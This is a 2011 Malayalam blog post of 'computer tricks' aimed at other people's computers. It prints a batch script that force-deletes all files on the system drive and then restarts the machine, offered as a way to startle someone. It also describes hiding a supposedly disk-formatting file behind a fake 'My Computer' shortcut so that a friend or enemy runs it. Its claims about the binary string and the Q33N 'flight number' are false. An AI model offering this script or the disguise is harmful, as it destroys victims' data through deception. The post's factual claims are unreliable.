Sunday, January 2, 2011

The most amazing computer tricks ever

                                      താഴെ പറയുന്നു കമ്പ്യൂട്ടര്‍ ട്രിക്കുകള്‍ നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ചെയ്യാതിരിക്കുക.പഠനവുമായി ബന്ധപ്പെട്ട്‌ മാത്രമേ ഈ ലേഖനത്തെ കാണാവൂ.അതല്ല നിങ്ങള്‍ ഒരു കമ്പ്യൂട്ടര്‍ expert ആണെങ്കില്‍ നിങ്ങളുടെ സ്വന്തം ഉത്തരവാദിത്വത്തില്‍ ചെയ്യാവുന്നതാണ്.ഇതുമായി ബന്ധപ്പെട്ട ഒരു പ്രശ്നത്തിനും ലേഖകന്‍ ഉത്തരവാദി ആയിരിക്കില്ല.

ആദ്യമായി താഴെ പറയുന്ന ബൈനറി കോഡ്‌ കോപ്പി ചെയ്യുക.

01001011000111110010010101010101010000011111100000


ഇത് നിങ്ങളുടെ നോട്ട്പാഡില്‍ പേസ്റ്റ് ചെയ്യുക.


"whateveyouwish.exe" എന്ന പേരില്‍ സേവ് ചെയ്യുക
.
ഇനി നിങ്ങളിത് ഓപ്പണ്‍ ചെയ്‌താല്‍ ഇത് നിങ്ങളുടെ ഹാര്‍ഡ് ഡിസ്കിനെ ഫോര്‍മാറ്റ് ചെയ്യുന്നതാണ്.


                          നിങ്ങള്‍ക്ക് വേണമെങ്കില്‍ ഇത് മറ്റൊരു കമ്പ്യൂട്ടറില്‍ കോപ്പി ചെയ്ത് പെട്ടെന്ന് കണ്ടെത്താന്‍ പറ്റാത്ത രീതിയില്‍ ഒരു ഫോള്‍ഡറിലാകി   ഹൈഡ് ചെയ്ത് വെക്കുക.അതിനു മുമ്പ് ടെസ്ക്ടോപിലേക്ക് ഒരു shortcut കീ ഉണ്ടാക്കുക.ഫോള്‍ഡര്‍ ഹൈഡ് ചെയ്തതിനു ശേഷം ഡെസ്ക്ടോപ്പില്‍ വന്നു shortcut ന്‍റെ ഐകണ്‍ മാറ്റി മൈ  കമ്പ്യൂട്ടര്‍  ഐകണ്‍ ആക്കുക.ശേഷം ഡസ്ക് ടോപ്പിലെ ആദ്യമുണ്ടായിരുന്ന മൈ കമ്പ്യൂട്ടര്‍ shortcut ഡിലിറ്റ് ചെയ്യുക.ഇനി നിങ്ങളുടെ സുഹ്രത്ത് അല്ലെങ്കില്‍ ശത്രു ഈ ഐകണില്‍ ക്ലിക്ക് ചെയ്‌താല്‍ അയാളുടെ കമ്പ്യൂട്ടര്‍ ഫോര്‍മാറ്റ് ആയിരിക്കും.  


ഇനി   മറ്റാരെങ്കിലും  PC restart ചെയ്യുമ്പോള്‍    അയാളെ  നിങ്ങള്‍ക്ക് അമ്പരപ്പിക്കണോ?


എങ്കില്‍  ഇനി പറയുന്ന പോലെ  ചെയ്യൂ .


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


മുകളില്‍   പറഞ്ഞ  കോഡ്‌ '.bat' എന്ന ഫോര്‍മാറ്റില്‍  സേവ് ചെയ്യുക.


World trade center trick
       നമുക്കെല്ലവാര്‍ക്കും  september 11 word trade center ആക്രമണത്തെ കുറിച്ച്  അറിയാം .110 ഓളം  നിലയുള്ള  ആ വലിയ കെട്ടിടത്തെ ഒരു വിമാനം ഇടിച്ചിറക്കി തകര്‍ത്ത കാര്യം .ആ വിമാനത്തിന്‍റെ നമ്പര്‍ Q33N എന്നാണ്.ഇനി പറയുന്നത് ശ്രധിക്കൂ Q33N എന്ന്  നോട്ട്പാഡില്‍ ടൈപ് ചെയ്യുക ശേഷം അതിന്‍റെ സൈസ് 72 ആകുക പിന്നെ അതിന്‍റെ  ഫോണ്ട്  "wingdings" ആക്കുക.ഇപ്പോള്‍ നിങ്ങള്‍ക്ക് താഴെ കാണുന്ന പോലെ കാണാം. 




കൂടുതല്‍ ട്രിക്കുകള്‍ക്കും ടിപ്സുകല്‍ക്കുമായി കാത്തിരിക്കുക.


If you want tricks in English then just mail me

1 comments:

Unknown said...

ഹെലോ ഞാന്‍ ഒരു ബ്ലോഗ്‌ ഉള്ള ആളാണ്, ഈ ഞങ്ങള്‍ക്ക് കിട്ടുന്ന ഈ അറിവുകള്‍ എന്‍റെ ബ്ലോഗ്‌ വഴി ഞാന്‍ ഷെയര്‍ ചെയ്യുന്നതില്‍ തങ്ങള്‍ക്ക് വിരോധമില്ലെന്ന് ഞാന്‍ കരുതട്ടേ...

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Powered by Blogger